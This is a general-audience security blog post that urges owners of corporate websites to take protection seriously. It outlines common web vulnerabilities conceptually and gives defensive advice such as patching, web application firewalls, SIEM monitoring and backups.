If you dismiss protection of your corporate website from cyber threats as a time-waster, you just don’t know what such negligence can bring.
Think of a corporate website as a company’s business card that you show to potential customers, investors or business partners. There’s some similarity, isn’t there? For sure, no one will give the card with typos, blurry letters and inky top that will make your clients’ hands filthy. Why then, business owners may skip from their agenda the risk of their website visitors’ potential exposure to cyber-threats?
The reason for such information security negligence can be that non e-commerce website owners are unaware of business risks, despite information security consultants’ attempts to burst ‘this bubble of ignorance’. Too often corporate decision-makers believe that their assets are out of cyber criminals’ interests. Sometimes, they fail to see any connection between their website security and business success.
The flipside of poor website security
The reasons to take website security protection seriously are many:
- Website crash in a ransomware attack. This is the most innoxious, but still harmful thing that may happen. Cyber-criminals may crash websites just for the sake of it or encrypt website content and demand ransom in exchange for the decryption key.
- Security risks for visitors. Hackers can exploit a corporate website by stealing visitors’ personally identifiable information (credit card data, login/password credentials, etc.)
- Security risks for other businesses, public and government sites. A compromised website may serve as a platform for attacks on the websites of the company’s business partners. The perfect example is the 2013 “watering hole” attack, which involved Facebook, Twitter, Microsoft and Apple. The peculiarity of this attack is that it targets particular organizations (the 2013 “watering hole” attack targeted a group of mobile app developers). In this sort of attacks, the hacker infects with malware those websites that are frequently visited by the targeted organizations. Shortly after, some of the victims get infected as well.
Sometimes a small corporate website infected with malware is a part of a botnet with thousands of computers, which together can compromise national infrastructure.
- The threat of being blacklisted by Google. This happens when a corporate website becomes a part of a botnet or hosts malicious content used, for example, in phishing scams. If blacklisted by Google, one of the top search engines, your website will lose thousands of visitors and consequently potential customers.
- Reputation damage. This is, probably, the major reason for a corporate website security protection. Often website visitors are more cyber security-savvy than the website owners. They know that corporate websites are potentially insecure. Once hacked, it will be a long way for such websites to restore malware-clean reputation again.
Major website security vulnerabilities
Website security is ensured with software protection and access control, so the major website vulnerabilities come from those in software and access control.
Software vulnerabilities
- SQL Injection (SQLi)
According to Open Web Application Security Project (OWASP), SQLi poses a major security threat. This is the type of security vulnerability in which hackers supply not the data expected by a website but SQL statements that are interpreted by website (backend) and then a database. Using SQL commands, an attacker creates strings of code which can be entered into the URL, search boxes or sign-in forms. SQLi allows a perpetrator to get access to a website database. This, in turn, opens up further opportunities: to read sensitive data (user names, passwords), to modify the database, and perform admin-level operations.
- Cross-Site Scripting (XSS)
XSS allows an attacker to execute malicious scripts in a victim’s browser. This browser doesn’t suspect that the script comes from an ill-reputed source and executes it. This way, the attacker gains access to sensitive information like session cookies, gets the ability to change the content of a webpage or even infiltrate a victim’s computer and run malware on it.
- Inclusion vulnerabilities
There are two types of inclusion vulnerabilities – Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI means that a hacker uploads a locally executed malicious script to a victim’s server. RFI allows an attacker to include a remotely hosted file in the web server. LFI and RFI enable cyber-criminals to get unauthorized access to sensitive data and reveal it or execute malicious codes on the target server.
Access control vulnerability
Administrative interfaces on corporate websites and website content management systems (WCMS) are prime targets for brute force attacks. In this case, an attacker gains unauthorized access to a website by continuously trying out different passwords. If logged in successfully, a cyber-criminal will be able to view, change or delete the content and perform administrative functions.
Website protection tips
Your corporate website security is the indicator for customers that your company is reliable. Build it using the following website protection tips.
Enforce access control
This is the number-one best practice, which implies setting requirements for strong passwords and limiting the time for authorization and the number of login attempts.
Keep it updated
To prevent break-ins, make sure that you monitor the latest patches for your web applications and keep them constantly updated. Updates are primarily intended to mitigate SQLi and XSS attacks, as they are both script-based.
Employ penetration testing
This method belongs to the so-called ethical hacking, and helps to find vulnerabilities before a potential hacker can exploit them. This procedure is a compulsory element in any website security maintenance schedule and should be performed at least once a year.
- Install web application firewall (WAF)
WAF examines web traffic to spot suspicious activities and block illegitimate traffic (spammers, malicious bots) and hacking attempts (XSS attacks and SQL injections).
- Connect a corporate website to a SIEM system
A properly fine-tuned SIEM system is a powerful security tool which provides a number of opportunities to monitor and enhance the security of your corporate website, something that out-of-the-box SIEM tools can’t provide. Usually a corporate website is hosted on a cloud and a SIEM system is installed an on premise software. In this case, it’s required to establish a VPN channel between the cloud and QRadar solution. Here are 5 must-haves in SIEM system implementation:
Scan your website for vulnerabilities using external web services. This is the way to mimic hacker’s scanning activities. To do this, a SIEM solution should have vulnerability scanners which scan websites from the cloud.
Collect website access logs. Ensure your SIEM solution is fine-tuned to collect website access logs for SQLi, XSS and brute-force detection in a timely manner.
Collect logs from the operating system. When an attacker hacks a website, they may get the OS-level access as well. Monitoring OS logs, SIEM system may detect suspicious activities in the network.
Monitor DMZ traffic. DMZ (Demilitarized zone) is where all web servers are placed. It is a buffer zone between a corporate network and the Internet. Every DMZ element that creates logs can be monitored by a SIEM system. If cyber-criminals managed to compromise a corporate website, they will continue their way to the corporate network.
In addition to the tips listed above, don’t neglect the following ones:
- Hide admin pages from search engine indexing
With unindexed admin pages, there’s a greater chance that cyber-criminals won’t find your corporate website through basic web search.
- Use SSL
The Secure Sockets Layer (SSL) cryptographic protocol secures communication between a web browser and a web server with encryption. As a result, HTTP address turns into HTTPS.
- Schedule backups
Back up your entire website’s data on a monthly, weekly or daily basis. The backing-up schedule should be estimated based on the data storage size, update frequency and daily website traffic. You can back up your website data manually by using a separate local computer or a cloud. Another variant is to employ automated backup solutions, such as Backup Machine, Codeguard and Dropmysite.
Don’t miss anything
Remember: if your website brings value to you and is of interest to your customers, hackers will also find something there to line their pockets. What an attacker needs is a single vulnerability to compromise a website. Therefore, it’s important to use every cyber protection method listed above.
[su_box title=”About Dmitry Nikolaenya” style=”noise” box_color=”#336588″][short_info id=’103095′ desc=”true” all=”false”][/su_box]
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.